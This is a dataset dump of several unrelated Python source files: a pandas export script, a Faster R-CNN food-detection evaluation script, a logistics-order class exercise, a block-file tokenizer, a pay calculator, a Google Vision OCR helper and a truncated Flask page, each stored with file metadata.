format we want to apply\nformato_artistas = {\n    \"type\": \"2_color_scale\",\n    \"min_value\": \"10\",\n    \"min_type\": \"percentile\",\n    \"max_type\": \"percentile\",\n    \"max_value\": \"99\"\n    }\n\nhoja_de_artistas.conditional_format(rango_de_celdas, formato_artistas)\nwriter.save()\n\n\n\n\n\nimport xlsxwriter\n\nexcel_grafico = xlsxwriter.Workbook('excel_graficas.xlsx')\nworksheet = excel_grafico.add_worksheet()\n\ndata = num_artistas.values\nworksheet.write_column('A1', data)\n\nchart = excel_grafico.add_chart({'type': 'line'})\n\nchart.add_series({'values': '=Sheet1!$A$1:$A$6'})\n\nworksheet.insert_chart('C1', chart)\n\nexcel_grafico.close()\n\n\n\n\n\n\n\n\n\n\n\n\n######## Export to a database\n\n\n\nwith sqlite3.connect('bbd_artist.bd') as conexion: \n    df4.to_sql('py_artistas', conexion)\n    \n    \n## Export to mysql\n    \nimport mysql.connector\nwith mysql.connect('mysql://edwin:123456@localhost:32771/test') as conexion:\n    df4.to_sql('tabla_mysql', conexion)\n    \n    \n    \n    \n### JSON #######\n\ndf2.to_json('artista.json', orient='table')\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"08-pandas/E_Output_Data.py","file_name":"E_Output_Data.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"501540083","text":"# --------------------------------------------------------\n# Tensorflow Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Jiasen Lu, Jianwei Yang, based on code from Ross Girshick\n# --------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport numpy as np\nimport pprint\nimport time\nimport _init_paths\n\nimport torch\n\nfrom torch.autograd import Variable\nimport pickle\nfrom roi_data_layer.roidb import combined_roidb\nfrom roi_data_layer.roibatchLoader import roibatchLoader\nfrom model.utils.config import cfg, cfg_from_file, cfg_from_list, get_output_dir\nfrom model.rpn.bbox_transform import clip_boxes\nfrom model.nms.nms_wrapper import nms\nfrom model.rpn.bbox_transform import bbox_transform_inv\nfrom model.utils.net_utils import save_net, load_net, vis_detections\nfrom model.utils.parser_func import parse_args, set_dataset_args, set_dataset_test_on_target_train\nfrom datasets.food_category import get_categories\nfrom model.faster_rcnn.vgg16_global_local import vgg16\nfrom model.faster_rcnn.resnet_global_local import resnet\nfrom model.faster_rcnn.prefood_res50_attention import PreResNet50Attention\nfrom model.faster_rcnn.vgg16_global_local_weakly import vgg16_weakly\nfrom model.faster_rcnn.resnet_global_local_weakly import resnet_weakly\nfrom model.faster_rcnn.vgg16_global_local_weakly_sum import vgg16_weakly_sum\nfrom model.faster_rcnn.resnet_global_local_unreversed import resnet_local_unreversed\nfrom model.faster_rcnn.vgg16_multiscale import vgg16_multiscale\nfrom model.faster_rcnn.faster_rcnn_global_local_backbone import FasterRCNN\nfrom model.faster_rcnn.faster_rcnn_weakly_backbone import FasterRCNN_Weakly\nfrom datasets.id2name import id2chn, id2eng\nimport cv2\nimport pdb\n\ntry:\n    xrange          # Python 2\nexcept NameError:\n    xrange = range  # Python 3\n\n\nlr = cfg.TRAIN.LEARNING_RATE\nmomentum = cfg.TRAIN.MOMENTUM\nweight_decay = cfg.TRAIN.WEIGHT_DECAY\n\nif __name__ == '__main__':\n\n    args = parse_args()\n\n    print('Called with 
args:')\n print(args)\n\n # set dataset : public dataset or food\n\n # public dataset\n args = set_dataset_args(args, test=True)\n #args = set_dataset_test_on_target_train(args)\n\n test_dataset = args.imdbval_name\n\n test_canteen = test_dataset.split('_')[1]\n\n args.set_cfgs = ['ANCHOR_SCALES', '[8, 16, 32]',\n 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '20']\n args.cfg_file = \"cfgs/{}_ls.yml\".format(\n args.net) if args.large_scale else \"cfgs/{}.yml\".format(args.net)\n\n if torch.cuda.is_available() and not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n np.random.seed(cfg.RNG_SEED)\n\n if args.cfg_file is not None:\n cfg_from_file(args.cfg_file)\n if args.set_cfgs is not None:\n cfg_from_list(args.set_cfgs)\n\n print('Using config:')\n pprint.pprint(cfg)\n\n cfg.TRAIN.USE_FLIPPED = False\n imdb, roidb, ratio_list, ratio_index = combined_roidb(\n test_dataset, False)\n imdb.competition_mode(on=True)\n\n print('{:d} roidb entries'.format(len(roidb)))\n\n # initilize the network here.\n\n # if args.net == 'vgg16':\n # fasterRCNN = vgg16(imdb.classes, pretrained=True,\n # class_agnostic=args.class_agnostic, lc=args.lc, gc=args.gc)\n\n # elif args.net == 'vgg16_multiscale':\n # fasterRCNN = vgg16_multiscale(imdb.classes, pretrained=False,\n # class_agnostic=args.class_agnostic,\n # lc=args.lc,\n # gc=args.gc)\n\n # elif args.net == 'res101':\n # fasterRCNN = resnet(imdb.classes, 101, pretrained=True,\n # class_agnostic=args.class_agnostic, lc=args.lc, gc=args.gc)\n\n # elif args.net == 'res101_local_unreversed':\n # fasterRCNN = resnet_local_unreversed(imdb.classes, 101, pretrained=True,\n # class_agnostic=args.class_agnostic,\n # lc=args.lc, gc=args.gc)\n\n # elif args.net == 'prefood':\n # fasterRCNN = PreResNet50Attention(imdb.classes, pretrained=True,\n # class_agnostic=args.class_agnostic,\n # lc=args.lc, gc=args.gc)\n\n # elif args.net == 'vgg16_weakly':\n # fasterRCNN = vgg16_weakly(imdb.classes, pretrained=True,\n # class_agnostic=args.class_agnostic,\n # lc=args.lc,\n # gc=args.gc)\n\n # elif args.net == 'vgg16_weakly_sum':\n # fasterRCNN = vgg16_weakly_sum(imdb.classes, pretrained=True,\n # class_agnostic=args.class_agnostic,\n # lc=args.lc,\n # gc=args.gc)\n\n # elif args.net == 'res50':\n # fasterRCNN = resnet(imdb.classes, 50, pretrained=True, class_agnostic=args.class_agnostic,context=args.context)\n # else:\n # print(\"network is not defined\")\n # pdb.set_trace()\n\n fasterRCNN = FasterRCNN_Weakly(imdb.classes,\n class_agnostic=args.class_agnostic,\n lc=args.lc, gc=args.gc,\n backbone_type='res101',\n weakly_type=args.weakly_type)\n fasterRCNN.create_architecture()\n\n print(\"load checkpoint %s\" % (args.load_name))\n checkpoint = torch.load(args.load_name)\n fasterRCNN.load_state_dict(checkpoint['model'], strict=False)\n if 'pooling_mode' in checkpoint.keys():\n cfg.POOLING_MODE = checkpoint['pooling_mode']\n\n print('load model successfully!')\n # initilize the tensor holder here.\n im_data = torch.FloatTensor(1)\n im_info = torch.FloatTensor(1)\n num_boxes = torch.LongTensor(1)\n gt_boxes = torch.FloatTensor(1)\n\n # ship to cuda\n if args.cuda:\n im_data = im_data.cuda()\n im_info = im_info.cuda()\n num_boxes = num_boxes.cuda()\n gt_boxes = gt_boxes.cuda()\n\n # make variable\n im_data = Variable(im_data)\n im_info = Variable(im_info)\n num_boxes = Variable(num_boxes)\n gt_boxes = Variable(gt_boxes)\n\n if args.cuda:\n cfg.CUDA = True\n\n if args.cuda:\n fasterRCNN.cuda()\n\n start = time.time()\n 
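# the usual Faster R-CNN evaluation setting: keep at most 100 detections per\n    # image and use a zero score threshold so every scored box enters the mAP pass\n    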
max_per_image = 100\n\n thresh = 0.0\n\n save_name = args.load_name.split('/')[-1]\n num_images = len(imdb.image_index)\n all_boxes = [[[] for _ in xrange(num_images)]\n for _ in xrange(imdb.num_classes)]\n\n output_dir = get_output_dir(imdb, save_name)\n dataset = roibatchLoader(roidb, ratio_list, ratio_index, 1,\n imdb.num_classes, training=False, normalize=False, path_return=True)\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=1,\n shuffle=False, num_workers=args.num_workers,\n pin_memory=True)\n\n data_iter = iter(dataloader)\n\n _t = {'im_detect': time.time(), 'misc': time.time()}\n det_file = os.path.join(output_dir, 'detections.pkl')\n\n if(args.test_cache):\n with open(det_file, 'rb') as f:\n all_boxes = pickle.load(f)\n else:\n fasterRCNN.eval()\n empty_array = np.transpose(np.array([[], [], [], [], []]), (1, 0))\n for i in range(num_images):\n\n data = next(data_iter)\n im_data.data.resize_(data[0].size()).copy_(data[0])\n im_info.data.resize_(data[1].size()).copy_(data[1])\n gt_boxes.data.resize_(data[2].size()).copy_(data[2])\n num_boxes.data.resize_(data[3].size()).copy_(data[3])\n\n det_tic = time.time()\n fasterRCNN_result = fasterRCNN(\n im_data, im_info, gt_boxes, num_boxes)\n if len(fasterRCNN_result) == 10:\n # normal global local model\n rois, cls_prob, bbox_pred, \\\n rpn_loss_cls, rpn_loss_box, \\\n RCNN_loss_cls, RCNN_loss_bbox, \\\n rois_label, d_pred, _ = fasterRCNN_result\n if len(fasterRCNN_result) == 9:\n # normal global or local model\n rois, cls_prob, bbox_pred, \\\n rpn_loss_cls, rpn_loss_box, \\\n RCNN_loss_cls, RCNN_loss_bbox, \\\n rois_label, d_pred = fasterRCNN_result\n elif len(fasterRCNN_result) == 13:\n # vgg16_multiscale model\n rois, cls_prob, bbox_pred, \\\n rpn_loss_cls, rpn_loss_box, \\\n RCNN_loss_cls, RCNN_loss_bbox, \\\n rois_label, d_pred, _, _1, _2, _3 = fasterRCNN_result\n\n scores = cls_prob.data\n boxes = rois.data[:, :, 1:5]\n d_pred = d_pred.data\n path = data[4]\n\n if cfg.TEST.BBOX_REG:\n # Apply bounding-box regression deltas\n box_deltas = bbox_pred.data\n if cfg.TRAIN.BBOX_NORMALIZE_TARGETS_PRECOMPUTED:\n # Optionally normalize targets by a precomputed mean and stdev\n if args.class_agnostic:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()\n box_deltas = box_deltas.view(1, -1, 4)\n else:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()\n box_deltas = box_deltas.view(\n 1, -1, 4 * len(imdb.classes))\n\n pred_boxes = bbox_transform_inv(boxes, box_deltas, 1)\n pred_boxes = clip_boxes(pred_boxes, im_info.data, 1)\n else:\n # Simply repeat the boxes, once for each class\n pred_boxes = np.tile(boxes, (1, scores.shape[1]))\n\n pred_boxes /= data[1][0][2].item()\n\n scores = scores.squeeze()\n pred_boxes = pred_boxes.squeeze()\n det_toc = time.time()\n detect_time = det_toc - det_tic\n misc_tic = time.time()\n\n vis = args.vis\n\n im2show = None\n if vis:\n im = cv2.imread(imdb.image_path_at(i))\n im2show = np.copy(im)\n\n for j in xrange(1, imdb.num_classes):\n inds = torch.nonzero(scores[:, j] > thresh).view(-1)\n # if there is det\n if inds.numel() > 0:\n cls_scores = scores[:, j][inds]\n _, order = torch.sort(cls_scores, 0, True)\n if args.class_agnostic:\n cls_boxes = pred_boxes[inds, :]\n else:\n cls_boxes = pred_boxes[inds][:, j * 4:(j + 1) * 4]\n\n cls_dets = torch.cat(\n (cls_boxes, 
cls_scores.unsqueeze(1)), 1)\n                    # cls_dets = torch.cat((cls_boxes, cls_scores), 1)\n                    cls_dets = cls_dets[order]\n                    keep = nms(cls_dets, cfg.TEST.NMS)\n                    cls_dets = cls_dets[keep.view(-1).long()]\n                    if vis:\n                        im2show = vis_detections(\n                            im2show, id2eng[imdb.classes[j]],\n                            np.array(cls_dets.cpu().numpy()), 0.5, [255, 0, 0],\n                            is_show_text=True)\n\n                    all_boxes[j][i] = cls_dets.cpu().numpy()\n                else:\n                    all_boxes[j][i] = empty_array\n\n            # Limit to max_per_image detections *over all classes*\n            if max_per_image > 0:\n                image_scores = np.hstack([all_boxes[j][i][:, -1]\n                                          for j in xrange(1, imdb.num_classes)])\n                if len(image_scores) > max_per_image:\n                    image_thresh = np.sort(image_scores)[-max_per_image]\n                    for j in xrange(1, imdb.num_classes):\n                        keep = np.where(\n                            all_boxes[j][i][:, -1] >= image_thresh)[0]\n                        all_boxes[j][i] = all_boxes[j][i][keep, :]\n\n            misc_toc = time.time()\n            nms_time = misc_toc - misc_tic\n\n            sys.stdout.write('im_detect: {:d}/{:d} {:.3f}s {:.3f}s   \r'\n                             .format(i + 1, num_images, detect_time, nms_time))\n            sys.stdout.flush()\n\n            # To save image for analysis\n            # Limit to threshold detections *over all classes*\n            if vis:\n                threshold_of_vis = 0.1\n                all_boxes_save_for_vis = all_boxes.copy()\n                if max_per_image > 0:\n                    image_scores = np.hstack([all_boxes_save_for_vis[j][i][:, -1]\n                                              for j in xrange(1, imdb.num_classes)])\n                    # np.sort(image_scores)[-max_per_image]\n                    image_thresh = threshold_of_vis\n                    for j in xrange(1, imdb.num_classes):\n                        keep = np.where(\n                            all_boxes_save_for_vis[j][i][:, -1] >= image_thresh)[0]\n                        all_boxes_save_for_vis[j][i] = all_boxes_save_for_vis[j][i][keep, :]\n\n                if all_boxes_save_for_vis[1][i].shape[0] == 0:\n                    continue\n                boxes_of_i = np.array([_[i]\n                                       for _ in all_boxes_save_for_vis])\n\n                # filter boxes with lower score\n                # index 0 because the batch size is 1\n                gt_boxes_cpu = gt_boxes.cpu().numpy()[0]\n                try:\n                    gt_boxes_cpu[:, 0:4] /= float(im_info[0][2].cpu().numpy())\n                except:\n                    pdb.set_trace()\n\n                save_vis_root_path = './savevis/{}/{}/{}_{}_{}/'.format(args.net, test_dataset,\n                                                                        args.checksession, args.checkepoch, args.checkpoint)\n\n                # show ground-truth\n                for gt_b in gt_boxes_cpu:\n                    try:\n                        # out of range\n                        show_cls_name = id2eng[imdb.classes[int(gt_b[-1])]]\n                    except:\n                        show_cls_name = 'Unknown'\n                    im2show = vis_detections(\n                        im2show, show_cls_name, gt_b[np.newaxis, :], 0.1, (0, 255, 0), True)\n\n                i_row, i_c, _ = im2show.shape\n                #im2show = cv2.resize(im2show, (int(i_c/2), int(i_row/2)))\n\n                # save all\n                save_vis_path = save_vis_root_path + \\\n                    'All/'\n                if not os.path.exists(save_vis_path):\n                    os.makedirs(save_vis_path)\n                cv2.imwrite(os.path.join(save_vis_path,\n                                         imdb.image_index[i]+'.jpg'), im2show)\n\n                # save by condition\n                # 1. ground-truth box not detected (missed)\n                # 2. ground-truth class predicted wrongly (TODO)\n\n                if False:\n                    for gt_b in gt_boxes_cpu:\n                        gt_cls_idx = int(gt_b[4])\n                        # 1 && 2\n                        if len(boxes_of_i[gt_cls_idx]) == 0:\n                            save_vis_path = save_vis_root_path + \\\n                                'FN/' + imdb.classes[int(gt_cls_idx)]\n                            if not os.path.exists(save_vis_path):\n                                os.makedirs(save_vis_path)\n                            # im2vis_analysis = vis_detections(\n                            #     im2show, imdb.classes[int(gt_b[-1])], gt_b[np.newaxis,:], 0.1, (204, 0, 0))\n                            cv2.imwrite(os.path.join(save_vis_path,\n                                                     imdb.image_index[i]+'.jpg'), im2show)\n\n            gt_classes = [int(_[-1]) for _ in gt_boxes_cpu]\n            # 3. 
FP\n for bi, det_b_cls in enumerate(boxes_of_i):\n if len(det_b_cls) > 0 and any(det_b_cls[:, 4] > 0.5):\n if bi not in gt_classes:\n save_vis_path = save_vis_root_path + \\\n 'FP/' + str(imdb.classes[bi])\n if not os.path.exists(save_vis_path):\n os.makedirs(save_vis_path)\n cv2.imwrite(os.path.join(save_vis_path,\n imdb.image_index[i]+'.jpg'), im2show)\n\n with open(det_file, 'wb') as f:\n pickle.dump(all_boxes, f, pickle.HIGHEST_PROTOCOL)\n\n end = time.time()\n print(\"test time: %0.4fs\" % (end - start))\n\n print('Evaluating detections')\n # evaluate mAP\n cls_ap_zip, dataset_mAP = imdb.evaluate_detections(\n all_boxes, output_dir)\n cls_ap = list(cls_ap_zip)\n\n # for excl canteen\n if 'excl' in test_canteen:\n val_categories = get_categories(\n \"{}\".format(test_canteen)+\"_\"+\"trainmt10\")\n # for collcted canteen cross domain test, which is the inner split\n else:\n val_categories = get_categories(\"{}\".format(test_canteen)+\"_\"+\"inner\")\n map_exist_cls = []\n\n save_record_file_path = \"/\".join(args.load_name.split('/')[:-1])\n load_model_name = args.load_name.split('/')[-1]\n with open(save_record_file_path + '/record_categroy.txt', 'w') as f:\n cls_chn_str = \"\"\n ap_str =\"\"\n cls_eng_str = \"\"\n if val_categories is not None:\n for cls, ap in cls_ap:\n if cls in val_categories:\n if np.isnan(ap):\n continue\n else:\n map_exist_cls.append(ap)\n cls_chn_str += id2chn[cls].replace('&', '')\n cls_chn_str += '&'\n cls_eng_str += id2eng[cls].replace('&', '')\n cls_eng_str += '&'\n ap_str += '{:.2f}'.format(ap * 100)\n ap_str += '&'\n print(cls, ap)\n f.write(id2eng[cls].replace('&', '') + '&' + '{:.2f}'.format(ap * 100) + '\\\\\\\\\\n')\n\n map_exist_cls = sum(map_exist_cls) / len(map_exist_cls)\n print(map_exist_cls)\n #f.write(cls_chn_str + '\\n' + cls_eng_str + '\\n' + ap_str)\n else:\n cls_str = \"\"\n for cls, ap in cls_ap:\n cls_str += cls.replace('&','')\n cls_str += '&'\n ap_str += '{:.2f}'.format(ap * 100)\n ap_str += '&'\n print(cls_ap_zip, dataset_mAP)\n f.write(cls_str + '\\n' + ap_str)\n\n\n\n with open(save_record_file_path + '/record.txt', 'a') as f:\n f.write(str(load_model_name) + '\\t')\n f.write(str(map_exist_cls) + '\\n')\n\n","sub_path":"app/test_backbone.py","file_name":"test_backbone.py","file_ext":"py","file_size_in_byte":19262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"279484523","text":"\"\"\"\nThis module contains program, which helps to make purchases in the virtual market.\n\"\"\"\n\n\nclass Item:\n \"\"\"\n This class creates objects (items), which you buy.\n\n >>> my_oitem = Item(\"salt\", 12)\n >>> my_oitem.name\n 'salt'\n \"\"\"\n\n def __init__(self, name, price):\n self.name = name\n self.price = price\n\n def __str__(self):\n \"\"\"\n Ths method returns your item`s name and price.\n\n >>> my_oitem = Item(\"salt\", 12)\n >>> my_oitem.__str__()\n 'salt, price - 12'\n \"\"\"\n return self.name + \", price - \" + str(self.price)\n\n\nclass Vehicle:\n \"\"\"\n This class creates objectes (vehicles).\n\n >>> my_vehicle = Vehicle(1, True)\n >>> my_vehicle.vehicleNo\n 1\n \"\"\"\n\n def __init__(self, vehicleNo, isAvailable):\n self.vehicleNo = vehicleNo\n self.isAvailable = isAvailable\n\n\nclass Location:\n \"\"\"\n This class creates object - location.\n\n >>> my_loc = Location(\"Kiev\", 42)\n >>> my_loc.city\n 'Kiev'\n \"\"\"\n\n def __init__(self, city, postoffice):\n self.city = city\n self.postoffice = postoffice\n\n\nclass Order():\n \"\"\"\n This class creates your order, 
according to the data you entered.\n\n >>> my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\\\n postoffice=53, items=my_items)\n >>> my_order.orderId\n 165488695\n \"\"\"\n\n def __init__(self, orderId, user_name, city, postoffice, items, vechile=None):\n self.orderId = orderId\n self.location = Location(city, postoffice)\n self.user_name = user_name\n self.items = items\n self.vechile = vechile\n\n def __str__(self):\n \"\"\"\n This method returns your order number.\n\n >>> my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\\\n postoffice=53, items=my_items)\n >>> my_order.__str__()\n 'Your order number is 165488695.'\n \"\"\"\n return \"Your order number is \" + str(self.orderId) + \".\"\n\n def calculateAmount(self):\n \"\"\"\n This method calculates the whole price of your products.\n\n >>> my_items = [Item('book', 110), Item('chupachups', 44)]\n >>> my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\\\n postoffice=53, items=my_items)\n >>> my_order.calculateAmount()\n 154\n \"\"\"\n result = 0\n for i in self.items:\n result += i.price\n return result\n\n def assignVechile(self, vechile: Vehicle):\n \"\"\"\n This method assigns a vehicle to the order, and returns nothing.\n \"\"\"\n self.vechile = vechile\n counter = 0\n for i in vechile:\n if i.isAvailable:\n i.isAvailable = False\n counter += 1\n break\n if counter == 0:\n print(\"There is no available vehicle to deliver an order.\")\n\n\nclass LogisticSystem():\n \"\"\"\n This clas creates objects which helps with navigating in your order.\n\n >>> vehicles = [Vehicle(1, True), Vehicle(2, True)]\n >>> my_items = [Item('book', 110), Item('chupachups', 44)]\n >>> my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\\\npostoffice=53, items=my_items)\n >>> logSystem = LogisticSystem([my_order], vehicles)\n >>> print(logSystem.orders[0])\n Your order number is 165488695.\n \"\"\"\n\n def __init__(self, orders, vehicles):\n self.orders = orders\n self.vehicles = vehicles\n\n def placeOrder(self, order: Order):\n \"\"\"\n This method submits your order, and assigns to it a vehicle.\n\n >>> vehicles = []\n >>> my_items = [Item('book', 110), Item('chupachups', 44)]\n >>> my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\\\npostoffice=53, items=my_items)\n >>> logSystem = LogisticSystem([my_order], vehicles)\n >>> logSystem.placeOrder(my_order)\n There is no available vehicle to deliver an order.\n \"\"\"\n self.order = order\n order.assignVechile(self.vehicles)\n\n def trackOrder(self, orderId):\n \"\"\"\n This method helps to track status of your order.\n\n >>> vehicles = [Vehicle(1, True), Vehicle(2, True)]\n >>> my_items = [Item('book', 110), Item('chupachups', 44)]\n >>> my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\\\npostoffice=53, items=my_items)\n >>> logSystem = LogisticSystem([my_order], vehicles)\n >>> logSystem.trackOrder(165488695)\n Your order #165488695 is sent to Lviv. Total price: 154 UAH.\n \"\"\"\n counter = 0\n for i in self.orders:\n if i.orderId == orderId:\n print(\"Your order #\" + str(orderId) + \" is sent to \" + i.location.city +\n \". 
Total price: \" + str(i.calculateAmount()) + \" UAH.\")\n                counter += 1\n                break\n        if counter == 0:\n            print(\"No such order.\")\n\n\nif __name__ == \"__main__\":\n    loc = Location(\"Lviv\", 12)\n    my_vehicles = [Vehicle(1, True), Vehicle(2, True)]\n    my_items = [Item('book', 110), Item('chupachups', 44)]\n    my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\n                     postoffice=53, items=my_items)\n    my_items2 = [Item('flowers', 11), Item(\n        'shoes', 153), Item('helicopter', 0.33)]\n    my_order2 = Order(186541566, 'Andrii', 'Odessa', 3, my_items2)\n    my_items3 = [Item('coat', 61.8), Item(\n        'shower', 5070), Item('rollers', 700)]\n    my_order3 = Order(186541546, \"Olesya\", 'Kharkiv', 17, my_items3)\n    print(my_order)\n    logSystem = LogisticSystem([my_order, my_order2, my_order3], my_vehicles)\n","sub_path":"labwork4/make_your_order.py","file_name":"make_your_order.py","file_ext":"py","file_size_in_byte":5653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"299047642","text":"import re, enum\nfrom typing import List\nfrom pathlib import Path\nfrom codecs import StreamReader\nfrom Parser.ParserLocalisation import Operator\n\n\nclass Token(object):\n\t\"\"\"A token parsed from a block-structured file.\"\"\"\n\n\tinverted = False\n\tdisabled = False\n\n\tdef __init__(self, Type: str, value: str, operator: object, parent):\n\t\tsuper().__init__()\n\t\tself.type = Type.lower()\n\t\tif value is None:\n\t\t\tself.value = None\n\t\telse:\n\t\t\t# strip one pair of surrounding double quotes, if present\n\t\t\tself.value = re.sub(r'^\"(.*)\"$', r'\\1', value)\n\t\tself.operator = operator\n\t\tself.parent = parent\n\t\tself.children = []\n\t\tif parent is not None:\n\t\t\tparent.add(self)\n\n\tdef add(self, child):\n\t\t\"\"\"Registers a child token of this block.\"\"\"\n\t\tself.children.append(child)\n\n\t@classmethod\n\tdef tokenize(cls, s: str, parent: 'Token') -> 'Token':\n\t\t\"\"\"Creates a token from a given string and its parent token.\n\n\t\t:param s: The string to turn into a token\n\t\t:param parent: The block it is contained within\n\t\t:return: The created token\n\t\t\"\"\"\n\t\toperator = None\n\t\tindex = -1\n\t\tif s.find('=') != -1:\n\t\t\toperator = Operator.EQUAL\n\t\t\tindex = s.find('=')\n\n\t\tif index == -1:\n\t\t\treturn cls(s, None, None, parent)\n\t\telse:\n\t\t\treturn cls(s[:index].strip(), s[index + 1:].strip(), operator, parent)\n\n\t@classmethod\n\tdef tokenizeFile(cls, fileStream: StreamReader) -> 'Token':\n\t\t\"\"\"Tokenizes a whole file into a tree rooted at a \"file\" token.\"\"\"\n\t\troot = cls(\"file\", None, None, None)\n\t\tblock = root\n\t\tlines = fileStream.readlines()\n\t\tfor string in lines:\n\t\t\tif string == \"}\":\n\t\t\t\tblock = block.parent\n\t\t\telif string.find('{') != -1:\n\t\t\t\tblock = cls.tokenize(string, block)\n\t\t\telse:\n\t\t\t\tcls.tokenize(string, block)\n\t\treturn root\n\n\tdef __str__(self) -> str:\n\t\tif self.value is None:\n\t\t\treturn self.type\n\t\telse:\n\t\t\top = \"\"\n\t\t\tif self.operator == Operator.LESS:\n\t\t\t\top = '<'\n\t\t\telif self.operator == Operator.EQUAL:\n\t\t\t\top = \"=\"\n\t\t\telse:\n\t\t\t\traise Exception(\"Invalid operator!\")\n\t\t\treturn \"{} {} {}\".format(self.type, op, self.value)\n\n\n\n","sub_path":"python/Parser/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"214456802","text":"def computepay(h,r):\r\n    try:\r\n        ihrs=float(h)\r\n        irate=float(r)\r\n    except:\r\n        print(\"Enter numbers\")\r\n        quit()\r\n    if ihrs <= 40:\r\n        pay=ihrs*irate\r\n        return pay\r\n    else:\r\n        pay=ihrs*irate\r\n        
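# overtime: hours beyond 40 earn an extra half of the base rate (1.5x overall)\r\n        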
ipay=(ihrs-40)*irate/2\r\n total=pay+ipay\r\n return total\r\n\r\n\r\n\r\nhrs=input(\"Enter hours worked: \")\r\nrate=input(\"Enter rate: \")\r\np=computepay(hrs,rate)\r\nprint(\"Pay\",p)","sub_path":"fpay.py","file_name":"fpay.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"504339595","text":"# '''from google.cloud import vision\r\n# import os\r\n# os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=\"gcp-explore-261416-44d1aa9d9fa7.json\"\r\n# client = vision.ImageAnnotatorClient()\r\n# import io\r\n#\r\n# path = \"/home/aashi/Downloads/index.jpeg\"\r\n# with io.open(path, 'rb') as image_file:\r\n# content = image_file.read()\r\n# image = vision.types.Image(content=content)\r\n# response = client.image_properties(image=image)\r\n# props = response.image_properties_annotation\r\n# print('Properties of the image:')\r\n#\r\n# for color in props.dominant_colors.colors:\r\n# print('Fraction: {}'.format(color.pixel_fraction))\r\n# print('\\tr: {}'.format(color.color.red))\r\n# print('\\tg: {}'.format(color.color.green))\r\n# print('\\tb: {}'.format(color.color.blue))'''\r\n\r\nimport os\r\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=\"client.json\"\r\n\r\ndef detect_text(path):\r\n \"\"\"Detects text in the file.\"\"\"\r\n from google.cloud import vision\r\n import io\r\n client = vision.ImageAnnotatorClient()\r\n\r\n with io.open(path, 'rb') as image_file:\r\n content = image_file.read()\r\n\r\n image = vision.types.Image(content=content)\r\n\r\n response = client.text_detection(image=image)\r\n texts = response.text_annotations\r\n # print(texts)\r\n # print(texts.description)\r\n # return (\"hello\")\r\n l = []\r\n for text in texts:\r\n l.append((text.description))\r\n\r\n # vertices = (['({},{})'.format(vertex.x, vertex.y)\r\n return l # for vertex in text.bounding_poly.vertices])\r\n\r\n # print('bounds: {}'.format(','.join(vertices)))\r\n\r\n# detect_text(\"C://Users//Shilpa Bundela//Desktop//ocr//upload_file_python-master//src//images//demo.jpg\")\r\n'''path and name of image'''\r\n# import os\r\n'''# os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=\"client.json\"'''\r\n# def detect_text(uri):\r\n# \"\"\"Detects text in the file located in Google Cloud Storage or on the Web.\r\n# \"\"\"\r\n# from google.cloud import vision\r\n# client = vision.ImageAnnotatorClient()\r\n# image = vision.types.Image()\r\n# image.source.image_uri = uri\r\n#\r\n# response = client.text_detection(image=image)\r\n# texts = response.text_annotations\r\n# print('Texts:')\r\n# print((texts))\r\n#\r\n# for text in texts:\r\n# print('\\n\"{}\"'.format(text.description))\r\n#\r\n# vertices = (['({},{})'.format(vertex.x, vertex.y)\r\n# for vertex in text.bounding_poly.vertices])\r\n#\r\n# print('bounds: {}'.format(','.join(vertices)))\r\n# detect_text(\"gs://uniqueway1/index.jpeg\")\r\n","sub_path":"Rachit_GoogleApi_Project/src/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"296860505","text":"#!/usr/bin/python3\n\"\"\"Script that starts a Flask web application\"\"\"\nfrom flask import Flask, render_template\nfrom models import storage\nfrom models import State\napp = Flask(\n __name__,\n template_folder=\"templates\"\n)\napp.url_map.strict_slashes = False\n\n\n@app.route('/states')\ndef states():\n \"\"\"display a HTML page\"\"\"\n new_dict = storage.all(State)\n return 
